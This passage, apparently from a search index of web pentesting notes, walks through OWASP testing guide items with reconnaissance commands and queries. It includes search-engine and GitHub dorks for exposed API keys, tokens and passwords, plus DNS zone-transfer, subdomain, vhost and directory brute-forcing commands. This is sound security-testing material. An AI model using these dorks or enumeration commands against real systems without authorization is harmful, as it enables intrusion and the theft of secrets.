        ID Link to Hackinglife Link to OWASP Description 2.9 WSTG-CONF-09 Test File Permission - Review and Identify any rogue file permissions. - Identify configuration file whose permissions are set to world-readable from the installation by default.","tags":["web pentesting","reconnaissance","WSTG-CONF-09"]},{"location":"OWASP/WSTG-CONF-10/","title":"Test for Subdomain Takeover","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.10. Test for Subdomain Takeover

        ID Link to Hackinglife Link to OWASP Description 2.10 WSTG-CONF-10 Test for Subdomain Takeover - Enumerate all possible domains (previous and current). - Identify forgotten or misconfigured domains.","tags":["web pentesting","reconnaissance","WSTG-CONF-10"]},{"location":"OWASP/WSTG-CONF-11/","title":"Test Cloud Storage","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.11. Test Cloud Storage

        ID Link to Hackinglife Link to OWASP Description 2.11 WSTG-CONF-11 Test Cloud Storage - Assess that the access control configuration for the storage services is properly in place.","tags":["web pentesting","reconnaissance","WSTG-CONF-11"]},{"location":"OWASP/WSTG-CONF-12/","title":"Testing for Content Security Policy","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.12. Testing for Content Security Policy

        ID Link to Hackinglife Link to OWASP Description 2.12 WSTG-CONF-12 Testing for Content Security Policy - Review the Content-Security-Policy header or meta element to identify misconfigurations.","tags":["web pentesting","reconnaissance","WSTG-CONF-12"]},{"location":"OWASP/WSTG-CONF-13/","title":"Test Path Confusion","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.13. Test Path Confusion

        ID Link to Hackinglife Link to OWASP Description 2.13 WSTG-CONF-13 Test Path Confusion - Make sure application paths are configured correctly.","tags":["web pentesting","reconnaissance","WSTG-CONF-13"]},{"location":"OWASP/WSTG-CRYP-01/","title":"Testing for Weak Transport Layer Security","text":"

        OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.1. Testing for Weak Transport Layer Security

        ID Link to Hackinglife Link to OWASP Description 9.1 WSTG-CRYP-01 Testing for Weak Transport Layer Security - Validate the server configuration (Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE) - Review the digital certificate's cryptographic strength and validity. - Ensure that the TLS security is not bypassable and is properly implemented across the application.","tags":["web pentesting","WSTG-CRYP-01"]},{"location":"OWASP/WSTG-CRYP-02/","title":"Testing for Padding Oracle","text":"

        OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.2. Testing for Padding Oracle

        ID Link to Hackinglife Link to OWASP Description 9.2 WSTG-CRYP-02 Testing for Padding Oracle - Identify encrypted messages that rely on padding. - Attempt to break the padding of the encrypted messages and analyze the returned error messages for further analysis.","tags":["web pentesting","WSTG-CRYP-02"]},{"location":"OWASP/WSTG-CRYP-03/","title":"Testing for Sensitive Information Sent via Unencrypted Channels","text":"

        OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.3. Testing for Sensitive Information Sent via Unencrypted Channels

        ID Link to Hackinglife Link to OWASP Description 9.3 WSTG-CRYP-03 Testing for Sensitive Information Sent via Unencrypted Channels - Identify sensitive information transmitted through the various channels. - Assess the privacy and security of the channels used. - Check sensitive data during the transmission: \u2022 Information used in authentication (e.g. Credentials, PINs, Session, identifiers, Tokens, Cookies\u2026), \u2022 Information protected by laws, regulations or specific organizational, policy (e.g. Credit Cards, Customers data)","tags":["web pentesting","WSTG-CRYP-03"]},{"location":"OWASP/WSTG-CRYP-04/","title":"Testing for Weak Encryption","text":"

        OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.4. Testing for Weak Encryption

        ID Link to Hackinglife Link to OWASP Description 9.4 WSTG-CRYP-04 Testing for Weak Encryption - Provide a guideline for the identification weak encryption or hashing uses and implementations.","tags":["web pentesting","WSTG-CRYP-04"]},{"location":"OWASP/WSTG-ERRH-01/","title":"Testing for Improper Error Handling","text":"

        OWASP Web Security Testing Guide 4.2 > 8. Error Handling > 8.1. Testing for Improper Error Handling

        ID Link to Hackinglife Link to OWASP Description 8.1 WSTG-ERRH-01 Testing for Improper Error Handling - Identify existing error output (i.e.: random files/folders (40x)). - Analyze the different output returned.","tags":["web pentesting","WSTG-ERRH-01"]},{"location":"OWASP/WSTG-ERRH-02/","title":"Testing for Stack Traces","text":"

        OWASP Web Security Testing Guide 4.2 > 8. Error Handling > 8.2. Testing for Stack Traces

        ID Link to Hackinglife Link to OWASP Description 8.2 WSTG-ERRH-02 Testing for Stack Traces N/A, This content has been merged into: WSTG-ERRH-01","tags":["web pentesting","WSTG-ERRH-02"]},{"location":"OWASP/WSTG-IDNT-01/","title":"Test Role Definitions","text":"

        OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.1. Test Role Definitions

        ID Link to Hackinglife Link to OWASP Description 3.1 WSTG-IDNT-01 Test Role Definitions - Identify and document roles used by the application. - Attempt to switch, change, or access another role. - Review the granularity of the roles and the needs behind the permissions given.


        ","tags":["web pentesting","WSTG-IDNT-01"]},{"location":"OWASP/WSTG-IDNT-02/","title":"Test User Registration Process","text":"

        OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.2. Test User Registration Process

        ID Link to Hackinglife Link to OWASP Description 3.2 WSTG-IDNT-02 Test User Registration Process - Verify that the identity requirements for user registration are aligned with business and security requirements. - Validate the registration process.","tags":["web pentesting","WSTG-IDNT-02"]},{"location":"OWASP/WSTG-IDNT-03/","title":"Test Account Provisioning Process","text":"

        OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.3. Test Account Provisioning Process

        ID Link to Hackinglife Link to OWASP Description 3.3 WSTG-IDNT-03 Test Account Provisioning Process - Verify which accounts may provision other accounts and of what type.","tags":["web pentesting","WSTG-IDNT-03"]},{"location":"OWASP/WSTG-IDNT-04/","title":"Testing for Account Enumeration and Guessable User Account","text":"

        OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.4. Testing for Account Enumeration and Guessable User Account

        ID Link to Hackinglife Link to OWASP Description 3.4 WSTG-IDNT-04 Testing for Account Enumeration and Guessable User Account - Review processes that pertain to user identification (e.g. registration, login, etc.). - Enumerate users where possible through response analysis.","tags":["web pentesting","WSTG-IDNT-04"]},{"location":"OWASP/WSTG-IDNT-05/","title":"Testing for Weak or Unenforced Username Policy","text":"

        OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.5. Testing for Weak or Unenforced Username Policy

        ID Link to Hackinglife Link to OWASP Description 3.5 WSTG-IDNT-05 Testing for Weak or Unenforced Username Policy - Determine whether a consistent account name structure renders the application vulnerable to account enumeration. - User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed. - Determine whether the application's error messages permit account enumeration.","tags":["web pentesting","WSTG-IDNT-05"]},{"location":"OWASP/WSTG-INFO-01/","title":"Conduct search engine discovery reconnaissance for information leakage","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.1. Conduct search engine discovery reconnaissance for information leakage

        ID Link to Hackinglife Link to OWASP Objectives 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services).

        This is merely passive reconnaissance.

        ","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#use-multiple-search-engines","title":"Use multiple search engines","text":"
        • Baidu
        • Bing
        • binsearch.info
        • Common crawl
        • Duckduckgo
        • Wayback machine
        • Startpage (based on Google, but without trackers and logs)
        • Shodan.
        ","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#use-operators","title":"Use operators","text":"","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#google-dorks","title":"Google Dorks","text":"

        More about google dorks.

        Google Dorking Query Expected results intitle:\"api\" site: \"example.com\" Finds all publicly available API related content in a given hostname. Another cool example for API versions: inurl:\"/api/v1\" site: \"example.com\" intitle:\"json\" site: \"example.com\" Many APIs use json, so this might be a cool filter inurl:\"/wp-json/wp/v2/users\" Finds all publicly available WordPress API user directories. intitle:\"index.of\" intext:\"api.txt\" Finds publicly available API key files. inurl:\"/api/v1\" intext:\"index of /\" Finds potentially interesting API directories. intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool This is one of my favorite queries. It lists potentially exposed API keys.

        Use cache operator

        cache:target.com\n
        ","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#github","title":"Github","text":"

        More about GitHub dorking.

        GitHub Dorking Query Expected results applicationName api key After getting results, filter by issue and you may find some api keys. It's common to leave api keys exposed when rebasing a git repo, for instance api_key - authorization_bearer - oauth - auth - authentication - client_secret - api_token - client_id - OTP - HOMEBREW_GITHUB_API_TOKEN - SF_USERNAME - HEROKU_API_KEY - JEKYLL_GITHUB_TOKEN - api.forecast.io - password - user_password - user_pass - passcode - client_secret - secret - password hash - user auth - extension: json nasa Results show some extensions that include json, so they might be API related shodan_api_key Results show shodan api keys \"authorization: Bearer\" This search reveals some authorization tokens. filename: swagger.json Go to Code tab and you will have the swagger file.","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#shodan","title":"Shodan","text":"

        Go to shodan.

        Shodan Dorking Query Expected results \"content-type: application/json\" This type of content is usually related to APIs \"wp-json\" If the target is using WordPress","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#waybackmachine-with-waybackurls","title":"WaybackMachine with WayBackUrls","text":"

        waybackurls inspects URLs saved by the Wayback Machine and looks for specific keywords. Installation:

        go install github.com/tomnomnom/waybackurls@latest\n

        Basic usage:

        waybackurls -dates https://example.com > waybackurls.txt\n\ncat waybackurls.txt\n

        Dork for API endpoints discovery:

        Waybackmachine Dorking Query Expected results Path to an API We are trying to see if there is a recorded history of the API. It may provide us with endpoints that used to exist but allegedly do not anymore.","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-02/","title":"Fingerprint Web Server","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.2. Fingerprint Web Server

        ID Link to Hackinglife Link to OWASP Objectives 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#passive-fingerprinting","title":"Passive fingerprinting","text":"","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#whois","title":"Whois","text":"
         whois $TARGET\n
        whois.exe <TARGET>\n
        ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#banner-grabbing","title":"Banner grabbing","text":"
        • nmap.
          # Grab banner of services in an IP\nnmap -sV --script=banner $ip\n\n# Grab banners of services in a range\nnmap -sV --script=banner $ip/24\n
        • telnet
        • openssl
          openssl s_client -connect target.site:443\nHEAD / HTTP/1.0\n
          • sending a malformed request (using a made-up SANTACLAUS method, for instance):
            GET / SANTACLAUS/1.1\n
        • Some targets obfuscate their servers by modifying headers, but there is a default ordering in the response headers, so you can still make an educated guess based on that ordering.
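
        For example, grab the response headers and compare their order against the defaults of common servers (hostname is a placeholder):

        curl -s -I http://target.site | head -n 8\n# e.g. Apache and nginx emit Date/Server/Content-Type in different default orders\n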

        ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#automatic-scanning-tools","title":"Automatic scanning tools","text":"

        netcraft, nikto.

        Netcraft can offer us information about the servers without even interacting with them, and this is something valuable from a passive information gathering point of view. We can use the service by visiting https://sitereport.netcraft.com and entering the target domain. We need to pay special attention to the latest IPs used. Sometimes we can spot the actual IP address from the webserver before it was placed behind a load balancer, web application firewall, or IDS, allowing us to connect directly to it if the configuration allows it.

        ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#active-fingerprinting","title":"Active fingerprinting","text":"","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#http-headers-and-html-source-code","title":"HTTP headers and HTML Source code","text":"
        • Note the response header Server, X-Powered-By, or X-Generator as well.
        • Identify framework specific cookies. For instance, the cookie CAKEPHP for php.
        • Review the source code and identify <meta> tags or attributes that follow typical patterns of certain servers (and/or frameworks).
        nmap -sV -F target\n
        ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-03/","title":"Review Webserver Metafiles for Information Leakage","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.3. Review Webserver Metafiles for Information Leakage

        ID Link to Hackinglife Link to OWASP Objectives 1.3 WSTG-INFO-03 Review Webserver Metafiles for Information Leakage - Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, <META> tag, sitemap.xml) - Extract and map other information that could lead to a better understanding of the systems at hand.","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-03/#searching-for-well-known-files","title":"Searching for well-known files","text":"
        • robots.txt
        • sitemap.xml
        • security.txt (proposed standard which allows websites to define security policies and contact details.)
        • human.txt (initiative for knowing the people behind a website.)
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-03/#examining-meta-tags","title":"Examining META tags","text":"

        <META> tags are located within the HEAD section of each HTML document.

        Robots directives can also be specified through the use of a specific META tag.

        <META NAME=\"ROBOTS\" ...>\n

        If no META tag is present, then the default is INDEX, FOLLOW.

        Other revealing META tags.

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-03/#the-well-known-directory","title":"The .well-known/ directory","text":"

        The registered well-known URIs are listed at: https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml.

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-04/","title":"Enumerate Applications on Webserver","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.4. Enumerate Applications on Webserver

        ID Link to Hackinglife Link to OWASP Objectives 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers

        Web application discovery is a process aimed at identifying web applications on a given infrastructure:

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#1-different-based-url","title":"1. Different based URL","text":"

        https://example.com/application1 and https://example.com/application2

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#google-dork","title":"google dork","text":"

        If these applications are indexed, try this google dork:

        site:example.com\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#gobuster","title":"gobuster","text":"

        gobuster Cheat sheet.

        Brute-force directory discovery, but it's not recursive (you need to specify a directory to perform a deeper scan).

        gobuster dir -u <exact target url> -w </path/dic.txt> --wildcard -b 401\n# -b: exclude a specific HTTP response code from the results\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#more-tools","title":"More tools","text":"Tool + Cheat sheet URL dirb DIRB is a web content fingerprinting tool. It scans the web server for directories using a dictionary file feroxbuster FEROXBUSTER is a web content fingerprintinf tool that uses brute force combined with a wordlist to search for unlinked content in target directories. httprint HTTPRINT is a web server fingerprinting tool. It identifies web servers and detects web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. wpscan WPSCAN is a wordpress security scanner.","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#2-non-standard-ports","title":"2. Non standard ports","text":"

        https://example.com:1234/ and https://example.com:8088/

        nmap -Pn -sT -p0-65535 $ip\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#3-virtual-hosts","title":"3. Virtual hosts","text":"

        https://example.com/ and https://webmail.example.com/

        A virtual host (vHost) is a feature that allows several websites to be hosted on a single server.

        There are two ways to configure virtual hosts:

        • IP-based virtual hosting
        • Name-based virtual hosting: The distinction for which domain the service was requested is made at the application level. For example, several domain names, such as admin.inlanefreight.htb and backup.inlanefreight.htb, can refer to the same IP. Internally on the server, these are separated and distinguished using different folders.
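
        Since the Host header decides which site is served in name-based hosting, you can probe it directly (the vhost names below are illustrative):

        curl -s http://$ip -H \"Host: admin.inlanefreight.htb\" | head\ncurl -s http://$ip -H \"Host: backup.inlanefreight.htb\" | head\n# Different content for the same IP reveals separate name-based vhosts\n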
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#identify-name-server","title":"Identify name server","text":"
        host -t ns example.com\n

        Request a zone transfer for example.com from one of its nameservers:

        host -l example.com ns1.example.com\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#dns-enumeration","title":"DNS enumeration","text":"

        More about DNS enumeration.

        gobuster (More complete cheat sheet: gobuster)

        gobuster dns -d <DOMAIN (without http)> -w /usr/share/SecLists/Discovery/DNS/namelist.txt\n

        Bash script, using Sec wordlist:

        for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n

        dig (More complete cheat sheet: dig)

        # Get email of administrator of the domain\ndig soa www.example.com\n# The email will contain a (.) dot notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# -ns: other name servers are known in NS record\n#  `@` character specifies the DNS server we want to query.\n\n# View all available records\ndig any example.com @$ip\n\n# Display version. query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n

        nslookup (More complete cheat sheet: nslookup)

        # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n

        DNScan (More complete cheat sheet: DNScan): Python wordlist-based DNS subdomain scanner. The script will first try to perform a zone transfer using each of the target domain's nameservers.

        dnscan.py (-d <domain> | -l <list>) [OPTIONS]\n# Mandatory Arguments\n#    -d  --domain                              Target domain; OR\n#    -l  --list                                Newline separated file of domains to scan\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#vhost-enumeration","title":"VHOST enumeration","text":"

        vHost Fuzzing

        # use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\ncat ./vhosts | while read vhost;do echo \"\\n********\\nFUZZING: ${vhost}\\n********\";curl -s -I http://$ip -H \"HOST: ${vhost}.example.com\" | grep \"Content-Length: \";done\n

        vHost Fuzzing with ffuf:

        # Virtual Host enumeration\n# use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\nffuf -w ./vhosts -u http://$ip -H \"HOST: FUZZ.example.com\" -fs 612\n# `-w`: Path to our wordlist\n# `-u`: URL we want to fuzz\n# `-H \"HOST: FUZZ.randomtarget.com\"`: This is the `HOST` Header, and the word `FUZZ` will be used as the fuzzing point.\n# `-fs 612`: Filter responses with a size of 612, default response size in this case.\n

        gobuster (More complete cheat sheet: gobuster)

        gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u <exact target url>\n# vhost : Uses VHOST for brute-forcing\n# -w : Path to the wordlist\n# -u : Specify the URL\n

        Wfuzz (More complete cheat sheet: Wfuzz):

        wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# --hc 404: Hide 404 code responses\n# -t 200: Concurrent Threads\n# -u http://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist\n# -H \"Host: FUZZ.nunchucks.htb\": Header; \"FUZZ\" marks the injection point for payloads\n# --hl 546: Filter out responses with a specific number of lines. In this case, 546\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-05/","title":"Review Webpage content for Information Leakage","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.5. Review Webpage content for Information Leakage

        ID Link to Hackinglife Link to OWASP Objectives 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage. - Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist.

        Sensitive information can include (but not limited to): Private API keys, internal IP addresses, debugging information, sensitive routes, or even credentials.

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-http-comments","title":"Review HTTP comments","text":"
        <!--\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-metatags","title":"Review METAtags","text":"

        They do not provide a vector attack directly, but allows an attacker to profile an application:

        <META name=\"Author\" content=\"John Smith\">\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-javascript-comments","title":"Review javascript comments","text":"
        Look for single-line (//) and multi-line (/* ... */) comments, both inline and within <script> tags and linked JavaScript files.

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-source-map-files","title":"Review Source map files","text":"

        Source map files can often be retrieved by appending the .map extension to .js files.
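
        For example (the path is hypothetical):

        curl -s https://example.com/static/app.js.map | head\n# A JSON body with \"sources\" / \"sourcesContent\" keys means the original source can be recovered\n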

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-06/","title":"Identify Application Entry Points","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.6. Identify Application Entry Points

        ID Link to Hackinglife Link to OWASP Objectives 1.6 WSTG-INFO-06 Identify Application Entry Points - Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#workflow","title":"Workflow","text":"","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#requests","title":"Requests","text":"
        • Identify GET and POST requests.
        • Identify parameters (hidden and not hidden, encoded and not, encrypted and not) in GET and POST requests.
        • Identify other methods.
        • Note additional or custom type headers
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#responses","title":"Responses","text":"
        • Identify when the \"Set-cookie\" is used, modified, added.
        • Identify patterns in responses: when you have 200, 302, 400, 403, or 500.
        • Pay attention to the response header \"Server.\"
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#using-the-attack-surface-detector-plugin","title":"Using the Attack Surface Detector plugin","text":"

        Download the Attack Surface Detector plugin in BurpSuite from: https://github.com/secdec/attack-surface-detector-cli/releases.

        Run the Attack Surface Detector CLI against the application source code:

        java -jar attack-surface-detector-cli-1.3.5.jar <source-code-path> [flags]\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#enumeration-techniques-for-http-verbs","title":"Enumeration techniques for HTTP verbs","text":"

        With netcat

        # Send an OPTIONS request with netcat\nnc victim.target 80\nOPTIONS / HTTP/1.0\n

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#using-kiterunner","title":"Using Kiterunner","text":"

        kiterunner Cheat sheet.

        Kiterunner is an excellent tool that was developed and released by Assetnote. Kiterunner is currently the best tool available for discovering API endpoints and resources. While directory brute-force tools like Gobuster/Dirbuster work to discover URL paths, they typically rely on standard HTTP GET requests. Kiterunner will not only use all HTTP request methods common with APIs (GET, POST, PUT, and DELETE) but also mimic common API path structures. In other words, instead of requesting GET /api/v1/user/create, Kiterunner will try POST /api/v1/user/create, mimicking a more realistic request.

        1. First, download the dictionaries from the project. In my case I downloaded them to /usr/share/wordlists/kiterunner/:

        • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
        • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
        • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
        • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz

        2. Run a quick scan of your target\u2019s URL or IP address like this:

        kr scan HTTP://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite  \n

        Note, however, that we conducted this scan without any authorization headers, which the target API likely requires.

        To use a dictionary (and not a kite file):

        kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt\n

        If you have many targets, you can save a list of line-separated targets as a text file and use that file as the target.

        One of the coolest Kiterunner features is the ability to replay requests. Thus, not only will you have an interesting result to investigate, you will also be able to dissect exactly why that request is interesting. To replay a request, copy the entire result line, paste it after the kb replay command, and include the wordlist you used:

        kr kb replay \"GET     414 [    183,    7,   8]://192.168.50.35:8888/api/privatisations/count 0cf6841b1e7ac8badc6e237ab300a90ca873d571\" -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

        Running this will replay the request and provide you with the HTTP response.

        To run Kiterunner with an authorization token (such as an \"x-access-token\" header), take the full token and add it to your Kiterunner scan with the -H option:

        kr scan http://IP -w /path/to/dict.txt -H 'x-access-token: eyJhGcwisdfdsfdfsdfsdfsdfdsfdsfddfdf.eyfakefakefakefaketokenfakeken._wcoooooo_kkkkkk_kkkk'\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-07/","title":"Map Execution Paths through applications","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.7. Map Execution Paths through applications

        ID Link to Hackinglife Link to OWASP Objectives 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough

        Map the target application and understand the principal workflows (paths, data flows, and race conditions).

        You may use automatic spidering tools such as Zed Attack Proxy (ZAP).

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#spidering","title":"Spidering","text":"","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#httrack","title":"HTTRack","text":"

        HTTRack tutorial

        Create a folder for replicating in it your target.

        mkdir targetsite\nhttrack domain.com  targetsite/\n

        Interactive mode:

        httrack\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#eyewitness","title":"EyeWitness","text":"

        EyeWitness tutorial

        First, create a file with the target domains, like for instance, listOfdomains.txt.

        Then, run:

        eyewitness --web -f listOfdomains.txt -d path/to/save/\n

        After that, you will get a report.html file with the requests and screenshots of those domains.

        # Proxing the request via BurpSuite\neyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#directoryfile-enumeration","title":"Directory/File enumeration","text":"","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#nmap","title":"nmap","text":"
        nmap -sV -p80 --script=http-enum <target>\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#dirb","title":"dirb","text":"

        Cheat sheet with dirb.

        dirb http://domain.com /usr/share/metasploit-framework/data/wordlists/directory.txt\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#gobuster","title":"gobuster","text":"

        Gobuster:

        gobuster dir -u <exact target url> -w </path/dic.txt> -b 403,404 -x .php,.txt -r \n# -b: exclude specific HTTP response codes from the results\n# -r: follow redirects\n# -x: append these extensions to each word from the dictionary\n
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#ffuf","title":"Ffuf","text":"

        Ffuf:

